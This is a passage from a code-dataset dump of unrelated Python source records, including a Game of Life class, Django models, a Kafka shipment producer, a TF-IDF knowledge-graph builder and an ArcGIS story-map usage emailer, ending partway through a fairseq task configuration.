0\n\n return new_grid\n\n def step(self) -> None:\n \"\"\"\n Выполнить один шаг игры.\n \"\"\"\n\n self.prev_generation = copy.deepcopy(self.curr_generation)\n self.curr_generation = self.get_next_generation()\n\n @property\n def is_max_generations_exceed(self) -> bool:\n \"\"\"\n Не превысило ли текущее число поколений максимально допустимое.\n \"\"\"\n if self.n_generation < self.max_generations:\n return False\n return True\n\n @property\n def is_changing(self) -> bool:\n \"\"\"\n Изменилось ли состояние клеток с предыдущего шага.\n \"\"\"\n if self.curr_generation == self.prev_generation:\n return False\n return True\n\n @staticmethod\n def from_file(filename: pathlib.Path) -> 'GameOfLife':\n \"\"\"\n Прочитать состояние клеток из указанного файла.\n \"\"\"\n grid = []\n strings = filename.read_text().split('\\n')\n rows = len(strings)\n cols = len(strings[0])\n strings = strings[:-1]\n for s in strings:\n sub_array = []\n for char in s:\n sub_array.append(int(char))\n grid.append(sub_array)\n game = GameOfLife((rows, cols), False)\n game.curr_generation = copy.deepcopy(grid)\n return game\n\n def save(self, filename: pathlib.Path) -> None:\n \"\"\"\n Сохранить текущее состояние клеток в указанный файл.\n \"\"\"\n f = open(filename, 'w')\n for s in self.curr_generation:\n for item in s:\n f.write(str(item).replace(\"'\", ''))\n f.write('\\n')\n","repo_name":"alenavee/cs102","sub_path":"homework03/life.py","file_name":"life.py","file_ext":"py","file_size_in_byte":4595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"3639528665","text":"from django.db import models\n\n\n\nclass Career(models.Model):\n image = models.ImageField(upload_to='media/')\n employers = models.IntegerField()\n youngers = models.FloatField()\n higher_education = models.IntegerField()\n specialist_in_banking = models.IntegerField()\n\n\nclass SuccessStories(models.Model):\n title = 
models.CharField(max_length=80, verbose_name='Title')\n text = models.TextField(verbose_name='Text')\n image = models.ImageField(upload_to='media/')\n\n\n\n\n","repo_name":"Olimjonnn/Asaka-Career","sub_path":"apps/career/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"45939727480","text":"import sys\n\ninput = sys.stdin.readline\n\nn = int(input())\ndata = input().rstrip()\nf = s = 0\nfor i in range(1, n):\n if data[i - 1] == 'S' and data[i] == 'F':\n f += 1\n elif data[i - 1] == 'F' and data[i] == 'S':\n s += 1\n\nprint(\"YES\" if f > s else \"NO\")","repo_name":"ThinkingDobby/PythonProgramming","sub_path":"codeforces/practice/year22/mon4/under1000/867A. Between the Offices.py","file_name":"867A. Between the Offices.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"11254262137","text":"from sklearn.preprocessing import LabelEncoder\nimport pandas as pd\nimport numpy as np\n\nclass DataSet(object):\n def __init__(self, x, y, seed = None, factores = None):\n np.random.seed(1 if seed is None else seed)\n self._cases = x.shape[0]\n self._x = self.encode(x)\n if factores == None:\n self._y = self.encode(y)\n else:\n self._y = self.factor_a_matriz(self.encode(y), factores)\n self._epochs_completed = 0\n self._index_in_epoch = 0\n \n @property\n def x(self):\n return self._x\n \n @property\n def y(self):\n return self._y\n \n def encode(self, data):\n if isinstance(data, pd.Series) :\n if data.dtypes == 'object' :\n le = LabelEncoder()\n data = le.fit_transform(data)\n else:\n data = data.values\n return data\n else :\n var_to_mod = data.columns[data.dtypes == 'object']\n if var_to_mod.size > 0 :\n le = LabelEncoder()\n for i in var_to_mod:\n data[i] = le.fit_transform(data[i])\n if isinstance(data, pd.DataFrame):\n return data.values\n else:\n return data\n \n def decode(self, data):\n #To do\n return None\n \n def factor_a_matriz(self, df, factores):\n df_ = df\n if isinstance(df, pd.Series):\n df_ = df.values\n if df_.shape[0] == df_.size:\n casos = df_.shape[0]\n indices = np.arange(casos) * factores \n factores_uno = np.zeros((casos, factores))\n factores_uno.flat[indices + df_.ravel()] = 1 #En cada factor mas el único valor de la etiqueta coloca un 1\n return factores_uno\n else:\n return df_\n \n def next_batch(self, batch_size, random = True):\n start = self._index_in_epoch\n if start == 0 and self._epochs_completed == 0 and random:\n perm0 = np.arange(self._cases)\n np.random.shuffle(perm0)\n \n self._x = self._x[perm0]\n self._y = self._y[perm0]\n \n if start + batch_size > self._cases:\n self._epochs_completed +=1\n rest_num = self._cases - start\n x_rest = self._x[start:self._cases]\n y_rest = self._y[start:self._cases]\n \n if random:\n perm = np.arange(self._cases)\n np.random.shuffle(perm)\n \n self._x = self._x[perm]\n self._y = self._y[perm]\n start = 0\n self._index_in_epoch = batch_size - rest_num\n end = self._index_in_epoch\n x_new_part = self._x[start:end]\n y_new_part = self._y[start:end]\n \n return np.concatenate((x_rest, x_new_part), axis = 0), np.concatenate((y_rest, y_new_part), axis = 0)\n else:\n self._index_in_epoch += batch_size\n end = self._index_in_epoch\n return self._x[start:end], 
self._y[start:end]\n","repo_name":"enzo-quiroz/tools-py","sub_path":"DataSet.py","file_name":"DataSet.py","file_ext":"py","file_size_in_byte":3160,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"6110261214","text":"\"\"\"Attachments interface\n\n Direct access to the attachments endpoint\n\n The user is not expected to use this class directly. It is an attribute of the\n :class:`Archivist` class.\n\n For example instantiate an Archivist instance and execute the methods of the class:\n\n .. code-block:: python\n\n with open(\".auth_token\", mode=\"r\", encoding=\"utf-8\") as tokenfile:\n authtoken = tokenfile.read().strip()\n\n # Initialize connection to Archivist\n arch = Archivist(\n \"https://app.rkvst.io\",\n authtoken,\n )\n with open(\"something.jpg\") as fd:\n attachment = arch.attachments.upload(fd)\n\n\"\"\"\n\n# pylint:disable=too-few-public-methods\n\n\nfrom copy import deepcopy\nfrom logging import getLogger\nfrom typing import TYPE_CHECKING, Any, BinaryIO\nfrom urllib.parse import urlparse\n\nif TYPE_CHECKING:\n from requests.models import Response\n\n # pylint:disable=cyclic-import # but pylint doesn't understand this feature\n from .archivist import Archivist\n\nfrom .constants import (\n ASSETATTACHMENTS_LABEL,\n ASSETATTACHMENTS_SUBPATH,\n ATTACHMENTS_LABEL,\n SEP,\n)\nfrom .dictmerge import _deepmerge\n\nLOGGER = getLogger(__name__)\n\n\nclass _AssetAttachmentsClient:\n \"\"\"AssetAttachmentsClient\n\n Access to attachments entities using CRUD interface. This class is usually\n accessed as an attribute of the Archivist class.\n\n Args:\n archivist (Archivist): :class:`Archivist` instance\n\n \"\"\"\n\n def __init__(self, archivist_instance: \"Archivist\"):\n self._archivist = archivist_instance\n self._public = archivist_instance.public\n self._subpath = f\"{archivist_instance.root}/{ASSETATTACHMENTS_SUBPATH}\"\n self._label = f\"{self._subpath}/{ASSETATTACHMENTS_LABEL}\"\n\n def __str__(self) -> str:\n if self._public:\n return \"AssetAttachmentsClient()\"\n\n return f\"AssetAttachmentsClient({self._archivist.url})\"\n\n def _identity(self, identity: str, attachment_id: str) -> str:\n \"\"\"Return fully qualified identity\n If public then expect a full url as argument\n\n identity looks like:\n\n [https://app.rkvst.io/archivist/public]assets/xxxxxxx\n\n OR\n\n [https://app.rkvst.io/archivist/public]assets/xxxxxxx/events/yyyyyy\n\n where the public URL is prefixed with the schema.\n\n \"\"\"\n uuid = attachment_id.split(SEP)[1]\n if self._public:\n # the public URL for the asset or event has to be changed\n url = urlparse(identity)\n root = \"/\".join(url.path.split(SEP)[:2])\n asset_id = \"/\".join(url.path.split(SEP)[2:])\n new_url = url._replace(\n path=f\"{root}/{ASSETATTACHMENTS_SUBPATH}/{ASSETATTACHMENTS_LABEL}/{asset_id}/{uuid}\"\n )\n return new_url.geturl()\n\n return f\"{self._label}/{identity}/{uuid}\"\n\n def __params(self, params: \"dict[str, Any]|None\") -> \"dict[str, Any]\":\n params = deepcopy(params) if params else {}\n # pylint: disable=protected-access\n return _deepmerge(self._archivist.fixtures.get(ATTACHMENTS_LABEL), params)\n\n def download(\n self,\n identity: str,\n attachment_id: str,\n fd: BinaryIO,\n *,\n params: \"dict[str, Any]|None\" = None,\n ) -> \"Response\":\n \"\"\"Read attachment\n\n Reads attachment into data sink (usually a file opened for write).\n Note that returns the response as the body will be consumed by the\n fd iterator\n\n Args:\n identity (str): identity\n 
attachment_id (str): blobs/aaaaaaaaaaaaa\n fd (file): opened file descriptor or other file-type sink.\n params (dict): e.g. {\"allow_insecure\": \"true\"} OR {\"strict\": \"true\" }\n\n Returns:\n REST response\n\n identity has one of the following 4 forms:\n\n [https://app.rkvst.io/archivist/][v2/] - if public\n assets/xxxxxxxxxxxxxxxxxxxxxxxxxx\n\n [https://app.rkvst.io/archivist/][v2/] - if public\n assets/xxxxxxxxxxxxxxxxxxxxxxxxxx/events/yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy\n\n \"\"\"\n\n return self._archivist.get_file(\n self._identity(identity, attachment_id), fd, params=self.__params(params)\n )\n\n def info(\n self,\n identity: str,\n attachment_id: str,\n ) -> \"dict[str, Any]\":\n \"\"\"Read asset attachment info\n\n Reads asset attachment info\n\n Args:\n identity (str): identity\n attachment_id (str): blobs/aaaaaaaaaaaaa\n\n Returns:\n REST response\n\n identity has one of the following 4 forms:\n\n [https://app.rkvst.io/archivist/][v2/] - if public\n assets/xxxxxxxxxxxxxxxxxxxxxxxxxx\n\n [https://app.rkvst.io/archivist/][v2/] - if public\n assets/xxxxxxxxxxxxxxxxxxxxxxxxxx/events/yyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy\n \"\"\"\n\n return self._archivist.get(f\"{self._identity(identity, attachment_id)}/info\")\n","repo_name":"rkvst/rkvst-python","sub_path":"archivist/assetattachments.py","file_name":"assetattachments.py","file_ext":"py","file_size_in_byte":5015,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"62"} {"seq_id":"43338664257","text":"__all__ = [\"PythonTestCase\"]\nimport os\nimport sys\nimport io\nimport unittest\nfrom test.utils import *\n\n\nclass PythonTestCase(TestCaseBase):\n def test_hello(self):\n \"\"\"Test calling python_hello with an argument.\"\"\"\n stdout, stderr = self.call(\n [\"testnodes.python_hello\", \"john\"], has_stdout=True, has_stderr=False\n )\n\n self.assertEqual(stdout, \"hello john !\", \"wrong output\")\n\n def test_hello_stderr(self):\n \"\"\"Test calling python_hello without arguments => print argparse help.\"\"\"\n stdout, stderr = self.call(\n [\"testnodes.python_hello\"], has_stdout=False, has_stderr=True\n )\n\n self.assertIn(\"usage: hello [-h]\", stderr, \"wrong output\")\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"gadalang/gada-pyrunner","sub_path":"test/test_python.py","file_name":"test_python.py","file_ext":"py","file_size_in_byte":767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} {"seq_id":"27452678343","text":"import os\nimport pandas as pd\nfrom tqdm import tqdm\nimport nltk\nfrom nltk.tokenize import word_tokenize\nfrom nltk.corpus import stopwords\nimport networkx as nx\nimport matplotlib.pyplot as plt\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom datetime import datetime\nimport random\nimport json\n\nclass KnowledgeGraphGenerator:\n def __init__(self, **kwargs):\n self.__dict__.update(kwargs)\n self.output_folder = None\n\n def create_output_folder(self):\n current_time = datetime.now().strftime(\"%Y%m%d%H%M%S\")\n self.output_folder = os.path.join('output', current_time)\n os.makedirs(self.output_folder, exist_ok=True)\n print('output_path:', self.output_folder)\n\n def read_excel(self, input_file):\n # Download Chinese stopwords\n nltk.download('stopwords', download_dir='data')\n # Download the tokenizer\n nltk.download('punkt', download_dir='data')\n pd_excel = pd.read_excel(input_file)\n return pd_excel\n\n def generate_knowledge_graph(self, data, node_filter=None, edge_filter=None):\n G = nx.DiGraph()\n\n 
tfidf_vectorizer = TfidfVectorizer(max_features=self.max_features, stop_words=stopwords.words('chinese'))\n tfidf_vectorizer.fit(data['摘要'])\n\n relation_counts = {} # dictionary used to count how many edges of each relation were added\n\n for idx, row in tqdm(data.iterrows(), total=len(data)):\n enterprise_id = row['企业id']\n patent_title = row['专利名称']\n applicant = row['申请人']\n inventors = row['发明人']\n summary = row['摘要']\n\n if node_filter is None or node_filter(patent_title):\n G.add_node(patent_title)\n if node_filter is None or node_filter(applicant):\n G.add_node(applicant)\n if node_filter is None or node_filter(enterprise_id):\n G.add_node(enterprise_id)\n\n inventors_list = inventors.split(';')\n\n for inventor in tqdm(inventors_list, leave=False):\n if node_filter is None or node_filter(inventor):\n G.add_node(inventor)\n G.add_edge(inventor, patent_title, relation='invented')\n relation_counts['invented'] = relation_counts.get('invented', 0) + 1\n\n if (node_filter is None or node_filter(enterprise_id)) and (node_filter is None or node_filter(applicant)):\n G.add_edge(enterprise_id, applicant, relation='chinese_name')\n relation_counts['chinese_name'] = relation_counts.get('chinese_name', 0) + 1\n if (node_filter is None or node_filter(applicant)) and (node_filter is None or node_filter(patent_title)):\n G.add_edge(applicant, patent_title, relation='applied_for')\n relation_counts['applied_for'] = relation_counts.get('applied_for', 0) + 1\n\n keywords_tfidf = self.extract_keywords_with_tfidf(summary, tfidf_vectorizer)\n\n for keyword in tqdm(keywords_tfidf, leave=False):\n if node_filter is None or node_filter(keyword):\n G.add_node(keyword)\n G.add_edge(patent_title, keyword, relation='keywords')\n relation_counts['keywords'] = relation_counts.get('keywords', 0) + 1\n\n print('Relation counts:', relation_counts) # report how many edges of each relation were added\n\n if edge_filter is not None:\n G = G.edge_subgraph([(node1, node2) for node1, node2, data in G.edges(data=True) if edge_filter(data['relation'])])\n\n return G\n\n def extract_keywords_with_tfidf(self, text, tfidf_vectorizer):\n X = tfidf_vectorizer.transform([text])\n top_keywords = X.toarray().argsort()[0][::-1][:self.top_n_keywords] # use self.top_n_keywords\n feature_names = tfidf_vectorizer.get_feature_names_out()\n return [feature_names[i] for i in top_keywords]\n\n def filter_keyword_edges(self, G):\n keyword_edges = [(node1, node2) for node1, node2, data in G.edges(data=True) if data['relation'] == 'keywords']\n G_keyword = G.edge_subgraph(keyword_edges)\n return G_keyword\n \n def select_connected_nodes_and_edges(self, G_keyword):\n connected_components = list(nx.connected_components(G_keyword.to_undirected()))\n\n if not connected_components:\n print('Error: no connected nodes and edges; adjust the parameters or check the input data')\n return [], []\n\n # Find the largest connected component\n max_connected_component = max(connected_components, key=len)\n\n # Turn the component into a subgraph object\n max_connected_subgraph = G_keyword.subgraph(max_connected_component)\n\n # Get the nodes and edges of the largest connected subgraph\n limited_nodes = list(max_connected_subgraph.nodes())\n limited_edges = list(max_connected_subgraph.edges())\n\n # Limit the number of nodes and edges, staying close to max_nodes and max_edges\n limited_nodes = random.sample(limited_nodes, min(self.max_nodes, max(self.min_nodes, len(limited_nodes))))\n limited_edges = random.sample(limited_edges, min(self.max_edges, max(self.min_edges, len(limited_edges))))\n\n return limited_nodes, limited_edges\n\n def generate_limited_graph(self, G_keyword, limited_edges):\n G_limited = G_keyword.edge_subgraph(limited_edges)\n return G_limited\n\n def draw_and_save_graph(self, 
G_limited):\n if self.layout == 'spring':\n pos = nx.spring_layout(G_limited)\n elif self.layout == 'random':\n pos = nx.random_layout(G_limited)\n elif self.layout == 'circular':\n pos = nx.circular_layout(G_limited)\n elif self.layout == 'kamada_kawai':\n pos = nx.kamada_kawai_layout(G_limited)\n else:\n pos = nx.spring_layout(G_limited) # fall back to the spring layout by default\n\n plt.figure(figsize=(10, 8))\n plt.rcParams['font.sans-serif'] = ['Arial Unicode MS']\n plt.rcParams['axes.unicode_minus'] = False\n nx.draw(G_limited, pos, width=1, with_labels=True, node_size=30, font_size=12, font_color='black', font_weight='bold', node_shape='o')\n plt.savefig(os.path.join(self.output_folder, 'knowledge_graph.png'))\n print('Connected nodes and edges found; knowledge graph saved')\n\n def save_triplets(self, G):\n triplets = []\n for edge in G.edges(data=True):\n entity_1, entity_2, relation_data = edge\n relation = relation_data['relation']\n triplets.append({'entity_1': entity_1, 'relation': relation, 'entity_2': entity_2})\n\n triplets_df = pd.DataFrame(triplets)\n triplets_df.to_csv(os.path.join(self.output_folder, 'triplets.csv'), index=False, encoding='utf-8-sig')\n print('Triplets saved')\n\n def display_graph(self, G_limited):\n print('Displaying the knowledge graph; close the figure manually or press Ctrl+C to stop')\n plt.show()\n \n def run(self, node_filter=None, edge_filter=None):\n self.create_output_folder()\n for input_file in self.input_files:\n data = self.read_excel(input_file)\n G = self.generate_knowledge_graph(data, node_filter=node_filter, edge_filter=edge_filter)\n G_keyword = self.filter_keyword_edges(G)\n limited_nodes, limited_edges = self.select_connected_nodes_and_edges(G_keyword)\n G_limited = self.generate_limited_graph(G_keyword, limited_edges)\n self.draw_and_save_graph(G_limited)\n self.save_triplets(G)\n self.display_graph(G_limited)\n print('Program finished normally')\n\nif __name__ == \"__main__\":\n with open('script/config_knowledgeGraphGenerator_tfidf.json', 'r') as f:\n config = json.load(f)\n # Custom filters for nodes and edges\n def custom_node_filter(node):\n return len(node) < 100\n\n def custom_edge_filter(relation):\n return relation == 'keywords'\n \n graph_generator = KnowledgeGraphGenerator(**config)\n graph_generator.run(node_filter=custom_node_filter, edge_filter=custom_edge_filter)
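\n\n# Illustrative config for script/config_knowledgeGraphGenerator_tfidf.json\n# (keys inferred from the attributes this class reads; the values are made up):\n# {\"input_files\": [\"patents.xlsx\"], \"max_features\": 1000,\n# \"top_n_keywords\": 5, \"min_nodes\": 10, \"max_nodes\": 100,\n# \"min_edges\": 10, \"max_edges\": 150, \"layout\": \"spring\"}\n","repo_name":"yuriamao/indus_kg","sub_path":"script/knowledgeGraphGenerator_tfidf.py","file_name":"knowledgeGraphGenerator_tfidf.py","file_ext":"py","file_size_in_byte":8163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} {"seq_id":"73822606597","text":"from arcgis.gis import GIS\nfrom datetime import datetime, timedelta\nimport pandas as pd\nimport os\nimport traceback\nimport smtplib\nfrom email.mime.text import MIMEText\nfrom email.mime.multipart import MIMEMultipart\n\n# Logging config\ntxtFile = open(\"C:\\\\Users\\\\Lucas.Piedrahita\\\\OneDrive - Wake County\\\\LP\\\\JupyterNotebooks\\\\story_map_views\\\\get_pros_story_map_views.txt\", \"w\")\ntxtFile.write(\"New execution of get_pros_story_map_views.py started at {0}\\n\\n\".format(datetime.now().strftime(\"%m/%d/%Y, %H:%M:%S\")))\n\n# Define variables\nlast_day_of_last_month = datetime.now().replace(day=1) - timedelta(days=1)\nlast_month_column_name = \"{0} Views\".format(last_day_of_last_month.strftime(\"%B %Y\"))\nAGOL_USER = os.environ.get(\"AGOL_USER\")\nAGOL_PASS = os.environ.get(\"AGOL_PASS\")\nstorymap_group_id = \"264e862549e24faca0bbc2ca92bc2dec\"\nfrom_address = \"no.reply@wakegov.com\"\ntroubleshoot_email_list = [\"Lucas.Piedrahita@wakegov.com\"]\nfull_email_list = 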
[\"Lucas.Piedrahita@wakegov.com\"]\nmsg = MIMEMultipart()\nmsg[\"From\"] = from_address\n\n# Define functions\ndef logMsg(message):\n print(message, end=\"\")\n txtFile.write(message)\n\ndef sendEmail(recipient_list, subject, body, text_type):\n logMsg(\"\\nEMAIL SENT:\\n'''\\nTo: {0}\\nSubject: {1}\\nBody:\\n{2}\\n'''\\nEnd of EMAIL SENT.\\n\".format(\", \".join(recipient_list), subject, body))\n msg[\"Subject\"] = subject\n msg[\"To\"] = \", \".join(recipient_list)\n msg.attach(MIMEText(body, text_type))\n emailbody = msg.as_string()\n # emailserver = smtplib.SMTP(\"smtprelay.wakegov.com\")\n # emailserver.sendmail(from_address, \", \".join(recipient_list), emailbody)\n # emailserver.quit()\n\ndef logError(message):\n logMsg(message)\n sendEmail(troubleshoot_email_list, \"Script get_pros_story_map_views.py failed\", message, \"plain\")\n\ndef getUsageStats(storymap):\n \"\"\" Return object of the title, id, total views since creation, \n and views during the previous month, for an input of a Web Mapping \n Application ArcGIS item, such as a storymap \"\"\"\n try:\n usage_df = storymap.usage(\"60D\")\n except IndexError:\n # This occurs for story maps younger than 60 days, where .usage(\"60D\") throws \"IndexError: list index out of range\" \n views_last_full_month = \"Storymap too young\"\n else:\n # Filter to get only the rows from the last full month\n usage_last_full_month_df = usage_df[pd.DatetimeIndex(usage_df[\"Date\"]).month == last_day_of_last_month.month]\n views_last_full_month = usage_last_full_month_df[\"Usage\"].sum()\n finally:\n usage_stats = {\n \"Tour Title\": storymap.title,\n \"Tour ID\": storymap.id,\n \"Total Views Since Creation\": storymap.numViews,\n last_month_column_name: views_last_full_month\n }\n return(usage_stats)\n\n# Run script:\ntry:\n try:\n # Connect to GIS\n gis = GIS(\"https://wake.maps.arcgis.com\", AGOL_USER, AGOL_PASS)\n logMsg(\"Connected to {0} as {1}\\n\\n\".format(gis.url, gis.properties[\"user\"][\"username\"]))\n except:\n logError(\"ERROR occurred while connecting to wake.maps.arcgis.com:\\n{0}\\n\".format(traceback.format_exc()))\n else:\n try:\n # Get storymaps from group\n storymaps_group = gis.groups.get(storymap_group_id)\n # Filter content in group to only get story maps and not maps & feature layers\n storymaps = list(filter(lambda item: (item.type == \"Web Mapping Application\"), storymaps_group.content()))\n logMsg(\"Story maps retrieved from the PROS Story Map Tours - Live group\\n\\n\")\n except:\n logError(\"ERROR occurred while retrieving story maps from the PROS Story Map Tours - Live group:\\n{0}\\n\".format(traceback.format_exc()))\n else:\n try:\n # Construct usage stats dataframe\n usage_stats_df = pd.DataFrame(columns=[\"Tour Title\", \"Tour ID\", \"Total Views Since Creation\", last_month_column_name])\n for storymap in storymaps:\n row = getUsageStats(storymap)\n usage_stats_df = usage_stats_df.append(row, ignore_index=True)\n except:\n logError(\"ERROR occurred while constructing the usage stats dataframe:\\n{0}:\\n\".format(traceback.format_exc()))\n else:\n # Check if usage stats dataframe is empty \n num_storymaps = usage_stats_df.shape[0]\n if num_storymaps < 1:\n logError(\"ERROR: The usage_stats_df FAILED VERIFICATION because it is empty: \\n{0}\\n\".format(usage_stats_df))\n else:\n # Check if the usage stats for the last month failed to be retrieved for every storymap\n usage_stats_df_failed = usage_stats_df[pd.to_numeric(usage_stats_df[last_month_column_name], errors='coerce').isnull()]\n num_storymaps_failed 
= usage_stats_df_failed.shape[0]\n some_failed = num_storymaps_failed > 0\n all_failed = num_storymaps_failed == num_storymaps\n if all_failed:\n logError(\"ERROR: The usage_stats_df FAILED VERIFICATION because none of the usage stats could be retrieved for the column, {0}.\\n{1}\\n\".format(last_month_column_name, usage_stats_df))\n else:\n # Send email to full email list\n logMsg(\"The usage_stats_df was verified to contain records and have at least one successfully retrieved value for the {0} column:\\n{1}\\n\".format(last_month_column_name, usage_stats_df))\n subject = \"PROS Story Map Tours Usage for {0}\".format(last_day_of_last_month.strftime(\"%B, %Y\"))\n usage_stats_df_formatted = usage_stats_df.drop(\"Tour ID\", axis=1).to_html(index=False)\n style = \"\"\"table {\n border: 1px solid #1C6EA4 !important;\n width: 620px;\n border-collapse: collapse;\n }\n table td, table th {\n border: 1px solid #AAAAAA;\n padding: 3px 3px;\n }\n table thead th {\n font-weight: bold;\n background: #458DBA;\n color: #FFFFFF;\n border-left: 2px solid #D0E4F5;\n }\n \"\"\"\n manual_check_sentence = \"\"\n if some_failed:\n # Include sentence about manually checking usage if some failed to be retrieved\n manual_check_sentence = \"If your tour is younger than 60-days-old, please email Ben Wittenberg (Ben.Wittenberg@wakegov.com) or Lucas Piedrahita (Lucas.Piedrahita@wakegov.com) and ask that they retrieve the usage stats manually.<br><br>\"\n message = \"\"\"\\\n <html>\n <head>\n <style>{0}</style>\n </head>\n <body>\n <p>The monthly PROS story map tours usage report for {1} can be seen below:<br>\n </p>\n {2}\n <p>{3}This is an automated email. Do not reply directly. If you have questions about this email or report, please email {4}.<br>\n </p>\n </body>\n </html>\n \"\"\".format(style, last_day_of_last_month.strftime(\"%B, %Y\"), usage_stats_df_formatted, manual_check_sentence, \" or \".join(troubleshoot_email_list))\n\n sendEmail(full_email_list, subject, message, \"html\")\nexcept:\n # If an unexpected/uncaught error is thrown\n logError(\"\\nScript failed unexpectedly at {0}:\\n{1}\\n\".format(datetime.now().strftime(\"%m/%d/%Y, %H:%M:%S\"), traceback.format_exc()))\n txtFile.close()\nelse:\n logMsg(\"\\nExecution of get_pros_story_map_views.py completed at {0}\\n\".format(datetime.now().strftime(\"%m/%d/%Y, %H:%M:%S\")))\n txtFile.close()\n","repo_name":"LucasPiedrahita/PROS_story_maps","sub_path":"get_pros_story_map_views.py","file_name":"get_pros_story_map_views.py","file_ext":"py","file_size_in_byte":8378,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"62"} {"seq_id":"9293045004","text":"#!/usr/bin/env python3\n\nfrom kafka import KafkaProducer, KafkaConsumer\nfrom kafka.errors import KafkaError\nfrom common import get_brokers\n\nimport datetime\nimport json\nimport time\nimport uuid\n\n\nCUSTOMERS = {}\n\n\ndef generate_shipment(invoice):\n shipment = {\n \"id\": str(uuid.uuid4()),\n \"invoice_id\": invoice[\"id\"],\n \"order_id\": invoice[\"order_id\"],\n \"customer_id\": invoice[\"customer_id\"],\n \"generated_on\": datetime.datetime.now().strftime(\"%Y-%m-%dT%H:%M:%S%z\"),\n \"destination\": CUSTOMERS[invoice[\"customer_id\"]][\"location\"],\n }\n\n return shipment\n\n\ndef update_customers(consumer):\n response = consumer.poll()\n\n i = 0\n for partition, customers in response.items():\n for customer in customers:\n i += 1\n\n CUSTOMERS[customer.value[\"id\"]] = customer.value\n\n if i:\n print(\"Updated {0} customers\".format(i))\n\n\nif __name__ == \"__main__\":\n brokers = get_brokers()\n\n producer = KafkaProducer(\n bootstrap_servers=brokers,\n value_serializer=lambda m: json.dumps(m).encode(\"utf-8\"),\n )\n\n customer_consumer = KafkaConsumer(\n \"customers\",\n bootstrap_servers=brokers,\n value_deserializer=lambda m: json.loads(m.decode(\"utf-8\")),\n auto_offset_reset=\"earliest\",\n enable_auto_commit=True,\n )\n\n invoice_consumer = KafkaConsumer(\n \"invoices\",\n bootstrap_servers=brokers,\n value_deserializer=lambda m: json.loads(m.decode(\"utf-8\")),\n auto_offset_reset=\"earliest\",\n enable_auto_commit=True,\n )\n\n # Resync the entire customer topic into memory\n customer_consumer.topics()\n customer_consumer.seek_to_beginning()\n\n while not CUSTOMERS:\n update_customers(customer_consumer)\n time.sleep(0.5)\n\n # Process invoices forever\n for invoice in invoice_consumer:\n # Update Customers each time\n update_customers(customer_consumer)\n\n # Process invoices\n shipment = generate_shipment(invoice.value)\n\n producer.send(\"shipments\", shipment)\n print(shipment)
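\n\n# Illustrative shape of one produced message (all field values are made up):\n# {\"id\": \"6f1c...\", \"invoice_id\": \"inv-1\", \"order_id\": \"ord-1\",\n# \"customer_id\": \"cust-1\", \"generated_on\": \"2019-01-01T12:00:00\",\n# \"destination\": \"Sydney\"}\n","repo_name":"michael-robbins/aws-streaming-session","sub_path":"part-1-kafka/step-4-ship-invoices.py","file_name":"step-4-ship-invoices.py","file_ext":"py","file_size_in_byte":2100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} {"seq_id":"10732203078","text":"import random\n\narr = []\nfor i in range(1001):\n arr.append(round(random.random()*100))\n\ndef selectionSort(arr):\n for i in range(len(arr)):\n temp = arr[i]\n j=i\n ind = i\n for j in range(j,len(arr),1):\n if temp > arr[j]:\n temp = arr[j]\n ind = j\n arr[ind] = arr[i]\n arr[i] = temp\n return 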
arr\nprint(arr)\nprint(selectionSort(arr))","repo_name":"Trogers32/Python_Stack","sub_path":"python/fundamentals/selection_sort.py","file_name":"selection_sort.py","file_ext":"py","file_size_in_byte":415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"62"} +{"seq_id":"29814783408","text":"from dataclasses import dataclass, field\n\nimport itertools\nimport logging\nimport os\n\nimport numpy as np\nimport torch\n\nfrom fairseq.logging import metrics\nfrom fairseq.data import (\n ConcatDataset,\n ConcatSentencesDataset,\n data_utils,\n Dictionary,\n IdDataset,\n indexed_dataset,\n NestedDictionaryDataset,\n NumSamplesDataset,\n NumelDataset,\n PrependTokenDataset,\n RawLabelDataset,\n RightPadDataset,\n SortDataset,\n TruncateDataset,\n TokenBlockDataset,\n)\nfrom fairseq.dataclass import ChoiceEnum, FairseqDataclass\nfrom fairseq.tasks import FairseqTask, register_task\nfrom omegaconf import II, MISSING\n\n\nEVAL_BLEU_ORDER = 4\nTARGET_METRIC_CHOICES = ChoiceEnum([\"bleu\", \"ter\"])\n\nlogger = logging.getLogger(__name__)\n\n\n@dataclass\nclass DiscriminativeRerankingNMTConfig(FairseqDataclass):\n data: str = field(default=MISSING, metadata={\"help\": \"path to data directory\"})\n num_data_splits: int = field(\n default=1, metadata={\"help\": \"total number of data splits\"}\n )\n no_shuffle: bool = field(\n default=False, metadata={\"help\": \"do not shuffle training data\"}\n )\n max_positions: int = field(\n default=512, metadata={\"help\": \"number of positional embeddings to learn\"}\n )\n include_src: bool = field(\n default=False, metadata={\"help\": \"include source sentence\"}\n )\n mt_beam: int = field(default=50, metadata={\"help\": \"beam size of input hypotheses\"})\n eval_target_metric: bool = field(\n default=False,\n metadata={\"help\": \"evaluation with the target metric during validation\"},\n )\n target_metric: TARGET_METRIC_CHOICES = field(\n default=\"bleu\", metadata={\"help\": \"name of the target metric to optimize for\"}\n )\n train_subset: str = field(\n default=II(\"dataset.train_subset\"),\n metadata={\"help\": \"data subset to use for training (e.g. 
